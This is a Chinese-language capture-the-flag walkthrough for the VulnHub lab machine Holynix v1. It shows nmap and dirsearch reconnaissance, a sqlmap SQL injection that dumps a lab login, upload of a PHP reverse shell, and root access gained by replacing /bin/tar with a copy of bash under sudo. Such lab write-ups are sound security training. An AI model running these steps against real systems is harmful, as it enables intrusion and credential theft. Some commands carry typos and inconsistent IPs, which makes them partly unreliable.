vulnhub靶机：Holynix: v1

下载

下载地址：https://www.vulnhub.com/entry/holynix-v1,20/

打开虚拟机

选择下载解压之后的文件打开

新添加一张 NAT 网卡，mac 地址修改如下

00:0c:29:bc:05:de

给原来的桥接网卡，随机生成一个 mac 地址

然后重启虚拟机

信息收集

主机发现

arp-scan -l

端口扫描

nmap -p- 192.168。109.139

目录扫描

python3 dirsearch.py -u "192.168.109.172" -i 200

访问 web

进入 login 登录页面

点登录抓包，把数据包放到 1.txt 里用 sqlmap 进行测试

SQL注入

python3 sqlmap.py -r "D:\desktop\1.txt" --batch --dump

发现了用户和密码的表

账号：hreiser
密码：Ik1Ll3dNiN@r315er

登录成功

文件上传

除了第一个用户都可以上传，利用 kali 自带的反弹shell 的 php 上传

locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .
vim php-reverse-shell.php
tar -czf shell.tar.gz php-reverse-shell.php

改成 kali（攻击机）的 IP 和监听端口

在 kali 的火狐浏览器上传 php 的压缩包，并勾选上自动解压（本机的火狐上传之后解压不成功）

开启监听

访问 kali 上的 url/~etenenbaum/ 页面，发现了上传的文件.

双击 php ，监听成功

sudo 提权

sudo -l 查看允许用户使用的命令

sudo -l

切换到/tmp目录下，将 /bin/bash 文件复制到 /tmp 目录下

cd /tmp
cp /bin/bash .

更改文件 /tmp/bash 的所有权，将所有者改为 root

sudo chown root:root/tmp/bash

将现有的 /bin/tar 文件备份到 bin/tar.bak 中

将 /tmp/bash 文件移动到 /bin/tar

执行 /bin/tar 命令，成功提权

sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar
sudo /bin/tar